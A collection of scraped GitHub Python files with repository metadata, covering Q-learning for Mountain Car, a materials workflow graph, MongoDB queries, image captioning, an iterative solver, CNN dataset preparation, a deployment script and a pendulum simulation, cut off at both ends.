end=' ' )\n\n results = env.step(picked_direction)\n\n obs = results[0]\n reward = results[1]\n done = results[2]\n\n new_index = obs_to_index( obs )\n\n thing = max(max( brain[ new_index[0], new_index[1], LEFT], brain[new_index[0], new_index[1], RIGHT] ), brain[new_index[0], new_index[1], NOTHING])\n \n if done:\n target_value = reward\n #target_value = -.5 #-5\n \n\n #alpha = .99\n #running_average_value = alpha*running_average_value + (1-alpha)*steps_till_crash\n\n #print( \"epsilon at : \" + str( epsilon ) + \" r\" + str(run_number) + \" stepped \" + str(steps_till_crash) + \" till crash or \" + str( running_average_value ) )\n #steps_till_crash = 0\n else:\n target_value = thing*discount + reward\n #steps_till_crash += 1\n\n\n existing_value = brain[ indexes[0], indexes[1], picked_direction ]\n\n brain[ indexes[0], indexes[1], picked_direction ] = existing_value * .9 + target_value * .1\n #print( \"changing from \" + str( existing_value ) + \" closer to \" + str( target_value ) + \" indexing at \" + str( indexes[0] ) + \", \" + str( indexes[1] ) )\n\n #if existing_value * .9 + target_value * .1 > 1:\n # print( \"ahahahah\" )\n\n #steps_final = steps_till_crash_array[-1]\n\n if run_number % 2000 == 0:\n #if steps_final == steps_till_crash_max:\n env.render()\n\n \n if done:\n env.reset()\n run_number += 1\n print( \"now on run \" + str( run_number ) )\n\n #env.render()\n \n \n\n \n\n \n", "repo_name": "Chadleewalker/AI", "sub_path": "Mountain Car.py", "file_name": "Mountain Car.py", "file_ext": "py", "file_size_in_byte": 3045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "gym.make", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 58, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "26619492853", "text": "\"\"\" Plots the workflow's graph\n\"\"\"\nimport os\nfrom graphviz import Digraph\n\nEXPLORE_URL = os.getenv('EXPLORE_URL', \"https://dev-www.materialscloud.org/explore/curated-cofs\")\n\n\ndef get_aiida_link(mat_dict, extra_tag):\n return \"{}/details/{}\".format(EXPLORE_URL, mat_dict[extra_tag].uuid)\n\n\ndef get_graph(mat_dict):\n \"\"\"Sketch a graph of the CO2 capture workflow (appl_pecoal).\n NOTE: dropped link to ProcessNodes because they are different depending from the workflow version, are not included \n in groups, ansd would be difficult to maintain.\n \"\"\"\n\n link_paper = \"https://doi.org/\" + mat_dict['doi_ref']\n link_github = \"https://github.com/danieleongari/CURATED-COFs/blob/master/cifs/{}.cif\".format(mat_dict['mat_id'])\n\n g = Digraph(\"Workflow's graph\")\n\n g.attr(rankdir='TB')\n g.attr(\"node\", style='filled', fillcolor='white:gray', gradientangle='45')\n\n g.node(\"Reference\\npublication\", shape=\"oval\", href=link_paper)\n g.node(\"GitHub\", shape=\"oval\", href=link_github)\n g.node(\"Original\\nstructure\", shape=\"oval\", href=get_aiida_link(mat_dict, \"orig_cif\"))\n g.node(\"geo1\", label=\"Geometric\\nproperties\", shape=\"oval\", href=get_aiida_link(mat_dict, \"orig_zeopp\"))\n g.node(\"DFT optimization\", shape=\"box\")\n g.node(\"DFT output details\", shape=\"oval\", href=get_aiida_link(mat_dict, \"dftopt\"))\n g.node(\"DDEC charges evaluation\", shape=\"box\")\n g.node(\"Optimized structure\\n W/DDEC charges\", shape=\"oval\", href=get_aiida_link(mat_dict, \"opt_cif_ddec\"))\n g.node(\"geo2\", label=\"Geometric\\nproperties\", shape=\"oval\", href=get_aiida_link(mat_dict, \"opt_zeopp\"))\n g.node(\"Adsorption calculation\\nCO2\", shape=\"box\")\n g.node(\"Adsorption calculation\\nN2\", shape=\"box\")\n g.node(\"Results CO2\", shape=\"oval\", href=get_aiida_link(mat_dict, \"isot_co2\"))\n g.node(\"Results N2\", shape=\"oval\", href=get_aiida_link(mat_dict, \"isot_n2\"))\n g.node(\"CCS process\\nperformances\", shape=\"oval\", href=get_aiida_link(mat_dict, \"appl_pecoal\"))\n\n g.edge(\"Reference\\npublication\", 'GitHub')\n g.edge('GitHub', 'Original\\nstructure')\n g.edge('Original\\nstructure', \"geo1\")\n g.edge('Original\\nstructure', \"DFT optimization\")\n g.edge(\"DFT optimization\", \"DDEC charges evaluation\")\n g.edge(\"DFT optimization\", \"DFT output details\")\n g.edge(\"DDEC charges evaluation\", \"Optimized structure\\n W/DDEC charges\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"geo2\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"Adsorption calculation\\nCO2\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"Adsorption calculation\\nN2\")\n g.edge(\"Adsorption calculation\\nCO2\", \"Results CO2\")\n g.edge(\"Adsorption calculation\\nN2\", \"Results N2\")\n g.edge(\"Results CO2\", \"CCS process\\nperformances\")\n g.edge(\"Results N2\", \"CCS process\\nperformances\")\n return g\n", "repo_name": "materialscloud-org/discover-curated-cofs", "sub_path": "detail/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 2811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.getenv", "line_number": 6, "usage_type": "call"}, {"api_name": "graphviz.Digraph", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "20409054800", "text": "from pymongo import MongoClient\n\n\ndef find_bid_in_range(host, port, udb, ucollection, gte, lte):\n connection = MongoClient(host, port)\n db = connection[udb]\n collection = db[ucollection]\n\n # cursor finds the bids within the given range. This is then converted to a Python list object\n # so that it can be printed below.\n cursor = collection.find({\"AuctionFeeTotal\": {\"$gte\": gte, \"$lte\" : lte}})\n results = list(cursor)\n\n # Validates that there are bids to be printed.\n if results is None:\n print(\"No bids found...\")\n return None\n\n # Print column titles\n field_list = [\"AuctionID\", \"AuctionTitle\", \"Fund\", \"AuctionFeeTotal\"]\n\n print(\"{0} | {1} | {2} | {3}\".format(field_list[0], field_list[1], field_list[2], field_list[3]))\n\n for i in results:\n listed_values = []\n for j in i:\n listed_values.append(i[j])\n print(\"{0} | {1} | {2} | {3}\".format(listed_values[2], listed_values[1], listed_values[3], listed_values[9]))\n\n return None\n\n\n# check_values abstracts the code for finding bids in the given range. The functions and logic below\n# validate the user input.\ndef check_values():\n loop_condition = True\n print(\"Find bids between a lesser and greater value Auction Fee Total\")\n while loop_condition:\n try:\n lesser = int(input(\"Enter the lesser value: \"))\n greater = int(input(\"Enter the greater value: \"))\n except:\n print(\"Enter a valid input...\")\n if lesser > greater:\n print(\"The lower value is greater than the higher value. Please enter valid inputs...\")\n else:\n find_bid_in_range('localhost', 27017, 'CityData', 'bids', lesser, greater)\n loop_condition = False\n\n", "repo_name": "JamesCourcelle/FinalProject", "sub_path": "MongoFiles/search_functions.py", "file_name": "search_functions.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "25352153151", "text": "from PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n\ndef create_image(typeofw, name, fi, group, chron):\n img = Image.open(\"input.jpg\")\n typeofw = typeofw.strip()\n name = name.strip()\n fi = fi.strip()\n group = group.strip()\n chron = chron.strip()\n\n group_number = group[2::]\n group = group[:2:]\n\n draw = ImageDraw.Draw(img)\n\n font = ImageFont.truetype(\"verdana.ttf\", 30)\n font_bold = ImageFont.truetype(\"verdana_bold.ttf\", 30)\n\n draw.text((630 - (len(typeofw) // 2 * 17), 255), typeofw, (255, 255, 255), font=font)\n\n draw.text((630 - (len(name) // 2 * 17), 360), name, (255, 255, 255), font=font)\n\n draw.text((630 - (len(fi) // 2 * 17), 481), fi, (255, 255, 255), font=font)\n\n draw.text((405, 595), group, (255, 255, 255), font=font)\n draw.text((445, 595), group_number, (255, 255, 255), font=font_bold)\n\n draw.text((875, 595), chron, (255, 255, 255), font=font_bold)\n result = img.save(\"result.jpg\")\n\n\ndef formating(text):\n l = \"\"\n for i in range(len(text) - 1):\n if text[i] + text[i + 1] == \", \":\n l = l + \",\"\n else:\n l = l + text[i]\n text = l + text[-1]\n return text\n\n\ndef check(text):\n n = 4\n for i in text:\n if i == \",\":\n n = n - 1\n return n == 0\n", "repo_name": "Smarandii/text_to_clapperboard_image_bot", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "32532153287", "text": "import numpy as np\nfrom scipy.fft import fft\n\nfrom task import DECIMAL_PLACES\n\n\ndef checkAccuracy(x, x1):\n eps = 10**-DECIMAL_PLACES\n for i in range(x.shape[0]):\n if (abs(x[i] - x1[i]) > eps):\n return False\n \n return True\n\n\n\n\ndef calrResultRelaxMethod(matrix, vector, w):\n \n x = np.zeros(matrix.shape[0])\n step = 1\n while(True):\n x1 = np.zeros(matrix.shape[0])\n x0 = x.copy()\n for i in range(matrix.shape[0]):\n x1[i] = (vector[i] - sum(matrix[i][j]*x[j] for j in range(matrix.shape[0])) + matrix[i][i]*x[i])/matrix[i][i]\n x[i] = w*x1[i] + (1 - w)*x0[i]\n print(str(step) + \" step: \" + str(x1))\n step += 1\n if(checkAccuracy(x1, x0)):\n x = x1.copy()\n break\n x = x1.copy()\n\n return x\n\ndef relax(matrix, vector):\n\n x = calrResultRelaxMethod(matrix, vector, w = 1.25)\n return x", "repo_name": "Vypsen/vichmat", "sub_path": "methods/relax.py", "file_name": "relax.py", "file_ext": "py", "file_size_in_byte": 923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "task.DECIMAL_PLACES", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "42949786145", "text": "\"\"\"\ni have many samples and i have a cnn that can detect patterns in images\nso i can prepare much bigger dataset from some source and run cnn through\nevery square that is not pattern i can add to bad class\nevere square without continuation by other square is also in bad class\nall other could be recommended to good class\nquestion: how to find out that square without continuation?\nanswer:\nAfter merging all rects, squares which sizes are 32x32 will stand alone they are in bad class\n\nNow we try to create concept for needed functions\nwe need to solve several problems\nwe must prepare new dataset\nwe must run through it with cnn\nwe must prepare three classes which are bad class without patterns,\nbad class with pattern but without continuation and\ngood class with both pattern and continuation\n\nwe now how to marge rects, we have complete class for it\nwe now how to check if square without continuation\n\nAll of that gives as an algorithm\n\n1) prepare bigger dataset (probably, several millions samples)\n2) decompose it by frames\n3) for each frame find it cwt and run cnn on it\n4) find all rects and merge them if it is needed\n5) each square that is not a pattern we can add to a first class\n6) each rect that is only 32x32 we can add to a second class\n7) each rect that is not 32x32 we can add to a good class\n\n\"\"\"\n\n\nimport random\nimport numpy as np\nimport pandas as pd\n\n# Keras Imports - CNN\nfrom keras.models import model_from_json\n\n# My scripts import\nfrom scripts.extremumlib import *\nfrom scripts.Segmentation import *\nfrom scripts.Rect import *\n\nimport time\nimport datetime\nimport json\n\n\n# load json and create\n\nmodel_json_path = '../../KerasCNN/models/model1.json' #model_nclasses_46_1\nmodel_h5_path = '../../KerasCNN/models/model1.h5'\njson_file = open(model_json_path, 'r')\nloaded_model_json = json_file.read()\njson_file.close()\ncnn = model_from_json(loaded_model_json)\n# load weights into new model\ncnn.load_weights(model_h5_path)\nprint(\"Loaded model from disk\")\n\n\nopt = 'adam'\nloss = 'categorical_crossentropy'\nmetrics = ['accuracy']\n# Compile the classifier using the configuration we want\ncnn.compile(optimizer=opt, loss=loss, metrics=metrics)\n\nwith open('temp.txt', 'r') as f:\n lines = list(f)\n price_series = [float(x) for x in lines[0][1:-2].split(',')]\n # print(line)\n n = len(price_series)\n # print(price_series)\n\nimages = []\n\nwindow_size = 256\n\nintervals = []\n\nbad_first_class = []\nbad_second_class = []\ngood_class = []\n\nfor b in range(0, len(price_series), 256):\n\n scale = 50\n\n x = np.arange(1, window_size + 1)\n y = np.arange(1, scale)\n\n X, Y = np.meshgrid(x, y)\n\n window = price_series[n - window_size - b: n - b]\n window = np.array(window)\n\n M = get_cwt_swt(window, scale=scale, mask=[1, 1, 1, 1, 1, 0, 0, 0, 0, 0])\n M = linear(M)\n # M = bound_filter(M, alpha=0.5)\n\n block_sizex = 32\n block_sizey = 32\n\n test = []\n coords = []\n\n for i in range(scale - block_sizex):\n for j in range(window_size - block_sizey):\n test.append(M[i:i + block_sizex, j:j + block_sizey])\n coords.append((i, j))\n\n test = np.array(test)\n test = test.reshape(test.shape[0], block_sizex, block_sizey, 1)\n result = cnn.predict(test, verbose=1)\n\n cnt = 0\n wow = []\n wow_coords = []\n\n for i in range(len(result)):\n if result[i, 1] > 0.80:\n cnt+=1\n wow.append(test[i, :, :, 0])\n wow_coords.append(coords[i])\n else:\n bad_first_class.append(test[i, :, :, 0])\n\n segmentations = []\n\n wow_rects = [Rect(wow_coords[i], 32, 32) for i in range(cnt)]\n\n wow_rects = sorted(wow_rects, key=lambda a: a.x[1])\n\n correct_rects = []\n\n for rect in wow_rects:\n if len(correct_rects) == 0:\n correct_rects.append(rect)\n elif not correct_rects[-1].is_crossing(rect):\n correct_rects.append(rect)\n else:\n correct_rects[-1] = correct_rects[-1].get_convex_rect(rect)\n\n for x in correct_rects:\n if x.h == x.w == 32:\n bad_second_class.append(M[x.x[0]: x.x[0] + x.h, x.x[1]: x.x[1] + x.w])\n else:\n good_class.append(M[x.x[0]: x.x[0] + 32, x.x[1]: x.x[1] + 32])\n\n wow = [M[x.x[0]: x.x[0] + x.h, x.x[1]: x.x[1] + x.w] for x in correct_rects]\n\n\ndata = []\nfor x in bad_first_class[:1000]:\n data.append((x, 0))\n\nfor x in bad_second_class:\n data.append((x, 1))\n\nfor x in good_class:\n data.append((x, 2))\n\n\ndef prepare_data(data):\n new_data = []\n for x, y in data:\n x = np.array(list(x.reshape((1, -1))[0, :]) + [y])\n # print(len(x))\n new_data.append(x)\n return pd.DataFrame(data=new_data)\n\n# size = len(data)\n# for i in range(size):\n# data.append((-data[i][0], data[i][1]))\n\nprint(len(data), len(bad_first_class), len(bad_second_class), len(good_class))\ndata = prepare_data(data)\ndata.to_csv('../../KerasCNN/input/data_cwt.csv', sep=',', header=None, index=None)\n\n\n\n", "repo_name": "CyberSoftStudio/TSForecasting", "sub_path": "scripts/training_data_preparation.py", "file_name": "training_data_preparation.py", "file_ext": "py", "file_size_in_byte": 4943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "keras.models.model_from_json", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "28686171433", "text": "import os\nimport json\nfrom datetime import datetime\n\nclass Deployment():\n base_path = \"\"\n base_name = \"\"\n subfiles = []\n config = {}\n def set_base_name(self, name):\n self.base_name = name\n \n def deploy(self):\n print(f\"Processing {self.base_name}\")\n self.mark_completed()\n\n def delete(self):\n print(f\"Deleting {self.base_name}\")\n for file in self.subfiles:\n os.remove(os.path.join(self.base_path, file))\n os.rmdir(self.base_path)\n\n \n def mark_completed(self):\n with open(os.path.join(self.base_path,\"completed.keep\") , \"w\") as fp:\n fp.write(self.base_name+\"\\n\")\n fp.write(str(datetime.now()))\n\n def mark_failed(self):\n with open(os.path.join(self.base_path,\"failed.keep\") , \"w\") as fp:\n fp.write(self.base_name+\"\\n\")\n fp.write(str(datetime.now()))\n\ndef mark_changed():\n with open(os.path.join(\"changed.nokeep\") , \"w\") as fp:\n fp.write(\"\\n\")\n fp.write(str(datetime.now()))\n\ndef read_json(path: str) -> dict:\n with open(path, \"r\") as fp:\n data = json.load(fp)\n return data\n\ndef get_deployments(root_dir):\n deployments = []\n deletions = []\n for root, dirs, files in os.walk(root_dir):\n print(\"Found deployments: \",dirs, \" on \", root_dir, files)\n for dir in dirs:\n print(\"Parsing Directory: \" + os.path.join(root, dir))\n d_ = Deployment()\n d_.base_path = os.path.join(root, dir)\n d_.set_base_name(os.path.basename(dir))\n subfiles = os.listdir(d_.base_path)\n subfiles = [f for f in subfiles if os.path.isfile(os.path.join(d_.base_path, f))] #Filtering only the files.\n d_.subfiles = subfiles\n if \"delete.keep\" in subfiles:\n deletions.append(d_)\n continue\n if \"completed.keep\" in subfiles:\n continue # Directory allready processed so skip \n if \"config.json\" in subfiles:\n d_.config = read_json(os.path.join(d_.base_path, \"config.json\"))\n deployments.append(d_)\n break\n\n return deployments,deletions\n\ndef process_deployment_creation(deploy_list: list[Deployment]) -> None:\n for d in deploy_list:\n print(f\"Deploying {d.base_name}\")\n d.deploy()\n mark_changed()\n\ndef process_deployment_deletion(deploy_list: list[Deployment]) -> None:\n for d in deploy_list:\n print(f\"Deleting {d.base_name}\")\n d.delete()\n mark_changed()\n\nif __name__ == \"__main__\":\n d_list = get_deployments(\"deployments\")\n process_deployment_creation(d_list[0])\n process_deployment_deletion(d_list[1])", "repo_name": "jptalukdar/GitOps-Workflows", "sub_path": "src/invoke.py", "file_name": "invoke.py", "file_ext": "py", "file_size_in_byte": 2452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.remove", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}]}
+{"seq_id": "14312078336", "text": "import numpy as np\nimport scipy.io as sio\nimport time\nfrom FeatWalk import featurewalk\n\n'''################# Load data #################'''\nmat_contents = sio.loadmat('ACM.mat')\nnumber_walks = 35 # 'Number of random walks to start at each instance'\nwalk_length = 25 # 'Length of the random walk started at each instance'\nwin_size = 5 # 'Window size of skipgram model.'\n\n'''################# Experimental Settings #################'''\nd = 100 # the dimension of the embedding representation\nX1 = mat_contents[\"Features\"]\nX2 = mat_contents[\"Network\"]\nLabel = mat_contents[\"Label\"]\ndel mat_contents\nn = X1.shape[0]\nIndices = np.random.randint(25, size=n)+1 # 5-fold cross-validation indices\n\nGroup1 = []\nGroup2 = []\n[Group1.append(x) for x in range(0, n) if Indices[x] <= 5] # 2 for 10%, 5 for 25%, 20 for 100% of training group\n[Group2.append(x) for x in range(0, n) if Indices[x] >= 21] # test group\nn1 = len(Group1) # num of instances in training group\nn2 = len(Group2) # num of instances in test group\nCombX1 = X1[Group1+Group2, :]\nCombX2 = X2[Group1+Group2, :][:, Group1+Group2]\n\n\n'''################# Large-Scale Heterogeneous Feature Embedding #################'''\nprint(\"Large-Scale Heterogeneous Feature Embedding (FeatWalk), 5-fold with 25% of training is used:\")\nprint(\"Estimated running time {} seconds\".format((n1+n2)*0.014))\nstart_time = time.time()\nH_FeatWalk = featurewalk(featur1=CombX1, alpha1=.97, featur2=None, alpha2=0, Net=CombX2, beta=0, num_paths=number_walks, path_length=walk_length, dim=d, win_size=win_size).function()\nprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n\n'''################# FeatWalk for a single feature matrix #################'''\nprint(\"FeatWalk for a single feature matrix:\")\nstart_time = time.time()\nH_FeatWalk_X = featurewalk(featur1=CombX1, alpha1=1, featur2=None, alpha2=0, Net=None, beta=0, num_paths=number_walks, path_length=walk_length, dim=d, win_size=win_size).function()\nprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n\nsio.savemat('Embedding.mat', {\"H_FeatWalk\": H_FeatWalk, \"H_FeatWalk_X\": H_FeatWalk_X})", "repo_name": "DEEP-PolyU/FeatWalk_AAAI19", "sub_path": "Runme.py", "file_name": "Runme.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.io.loadmat", "line_number": 7, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "FeatWalk.featurewalk", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "FeatWalk.featurewalk", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "33201543562", "text": "from sympy import *\r\nfrom scipy import sparse\r\nfrom numpy import empty\r\nfrom scipy.sparse.linalg import dsolve\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport scipy.integrate as integrate\r\nimport matplotlib.animation as animation\r\nimport time\r\n\r\n\r\ndef phi(xi, yi, di):\r\n\r\n return Matrix([xi**2+yi**2-di**2])\r\n\r\n\r\ndef cm_rhs(ci, bi, xi):\r\n\r\n \"\"\"Coefficient Matrix Right Hand Side: The function takes the coefficient\r\n matrix of the Lagrangian equations of motion of first kind, the second\r\n time derivative of the geometrical constraints, and the vectors of the\r\n unknowns. It provides the coefficient matrix of the linear algebraic\r\n equation system, and the right hand side of the equation.\"\"\"\r\n\r\n z = zeros(ci.shape[0], ci.shape[1]) #Makes zeros matrix of the same shape as the coefficient matrix\r\n n_b = zeros(bi.shape[0], bi.shape[1]) # Makes zeros matrix(column vector) as the right hand side\r\n s = 0\r\n for i, bi_val in enumerate(bi):\r\n for j, xi_val in enumerate(xi):\r\n z[-bi.shape[0]+i, j] = bi_val.coeff(xi_val)\r\n s += bi_val.coeff(xi_val)*xi_val\r\n n_b[i] = bi_val - s\r\n s = 0\r\n\r\n return ci - z, n_b\r\n\r\n\r\ndef n_sys_eq(ai, bi, ri, ri_t, r0i, r0i_t):\r\n\r\n \"\"\"The function replaces the symbolic variables with their numerical\r\n values and returns with sparse matrices.\"\"\"\r\n\r\n for j in range(len(ri)):\r\n ai = ai.subs(ri_t[j], r0i_t[j])\r\n ai = ai.subs(ri[j], r0i[j])\r\n bi = bi.subs(ri_t[j], r0i_t[j])\r\n bi = bi.subs(ri[j], r0i[j])\r\n return matrix2sparse(N(ai)), matrix2sparse(N(bi))\r\n\r\n\r\ndef st_space(ri, ri_t):\r\n\r\n \"\"\"The function interweaves the position and velocity vectors into a\r\n state space vector\"\"\"\r\n\r\n w = zeros(2*len(ri), 1)\r\n for i in range(len(w)):\r\n if i % 2 is 0:\r\n w[i] = ri[int(i/2)]\r\n else:\r\n w[i] = ri_t[int((i-1)/2)]\r\n return w\r\n\r\n\r\ndef cauchy_form(ai, bi, ri_t):\r\n\r\n \"\"\"The function rewrites the differential equation system into its\r\n Cauchy-form\"\"\"\r\n\r\n eye_m = eye(len(ri_t))\r\n z_m = zeros(ai.shape[0], len(ri_t))\r\n coeff_m = eye_m.row_join(zeros(len(ri_t), ai.shape[1]))\r\n a_c = coeff_m.col_join(z_m.row_join(ai))\r\n b_c = ri_t.col_join(bi)\r\n return a_c, b_c\r\n\r\n\r\ndef sys_rk4(ai, qi, r, r_t, ic, ic_t, h):\r\n\r\n nai, nqi = n_sys_eq(ai, qi, r, r_t, ic, ic_t)\r\n\r\n len_ict = len(ic_t)\r\n len_ic = len(ic)\r\n xi_1 = dsolve.spsolve(nai, nqi, use_umfpack=False)\r\n lbd = xi_1[len_ic+len_ict:]\r\n k_1 = h*xi_1\r\n\r\n ictk_1 = ic_t + 0.5 * k_1[len_ict:len_ic + len_ict]\r\n ick_1 = ic + 0.5*k_1[0:len_ict]\r\n nai_2, nqi_2 = n_sys_eq(ai, qi, r, r_t, ick_1, ictk_1)\r\n xi_2 = dsolve.spsolve(nai_2, nqi_2, use_umfpack=False)\r\n k_2 = h*xi_2\r\n\r\n ictk_2 = ic_t + 0.5 * k_2[len_ict:len_ic + len_ict]\r\n ick_2 = ic + 0.5 * k_2[0:len_ict]\r\n nai_3, nqi_3 = n_sys_eq(ai, qi, r, r_t, ick_2, ictk_2)\r\n xi_3 = dsolve.spsolve(nai_3, nqi_3, use_umfpack=False)\r\n k_3 = h*xi_3\r\n\r\n ictk_3 = ic_t + k_3[len_ict:len_ic + len_ict]\r\n ick_3 = ic + k_3[0:len_ict]\r\n nai_4, nqi_4 = n_sys_eq(ai, qi, r, r_t, ick_3, ictk_3)\r\n xi_4 = dsolve.spsolve(nai_4, nqi_4, use_umfpack=False)\r\n k_4 = h*xi_4\r\n\r\n y_sol = ic + (k_1[0:len_ict] + 2*(k_2[0:len_ict] + k_3[0:len_ict]) +\r\n k_4[0:len_ict])/6\r\n\r\n yt_sol = ic_t + (k_1[len_ict:len_ic + len_ict] +\r\n 2*(k_2[len_ict:len_ic + len_ict] +\r\n k_3[len_ict:len_ic + len_ict]) +\r\n k_4[len_ict:len_ic + len_ict])/6\r\n lbd_sol = lbd + (k_1[len_ic+len_ict:] + 2*(k_2[len_ic+len_ict:] +\r\n k_3[len_ic+len_ict:]) +\r\n k_4[len_ic+len_ict:])/6\r\n return y_sol, yt_sol, lbd_sol\r\n\r\n\r\ndef matrix2sparse(mi):\r\n \"\"\"Converts SymPy's matrix to a SciPy sparse matrix.\"\"\"\r\n a = empty(mi.shape, dtype=float)\r\n for i in range(mi.rows):\r\n for j in range(mi.cols):\r\n a[i, j] = mi[i, j]\r\n return sparse.csr_matrix(a)\r\n\r\n\r\nt = Symbol('t')\r\nlbd = Symbol('lbd')\r\nx = Function('x')(t)\r\ny = Function('y')(t)\r\nm = 1\r\ng = -9.81\r\nd_l = 2\r\nalpha = 10\r\nh = 0.01\r\nR = 0.5\r\nbeta = 10\r\n\r\nphi_r = Matrix([phi(x, y, d_l).diff(x), phi(x, y, d_l).diff(y)])\r\nphi_t = Matrix([phi(x, y, d_l).diff(t)])\r\nunknowns = Matrix([x.diff(t, t), y.diff(t, t), lbd])\r\nr = Matrix([x, y])\r\nr_t = r.diff(t)\r\n\r\nM = Matrix([[m, 0], [0, m]])\r\nF = Matrix([0, m*g])\r\nb = Matrix([- (phi_r.diff(t)).T*r.diff(t) - phi_t.diff(t) -\r\n 2*alpha*(phi_r.T*r.diff(t) + phi_t) -\r\n (beta**2)*phi(x, y, d_l)])\r\nZ = zeros(phi_r.shape[1])\r\nA = M.row_join(phi_r).col_join(phi_r.T.row_join(Z))\r\n\r\nC, Nb = cm_rhs(A, b, unknowns)\r\nQ = F.col_join(Nb)\r\n\r\nC_c, Q_c = cauchy_form(C, Q, r_t)\r\n\r\nsimulation_time = 4\r\nsteps = int(simulation_time/h)\r\nic = [N(sqrt(2)/2), -N(sqrt(2)/2)]\r\nic_t = [0, 0]\r\n\r\ny = 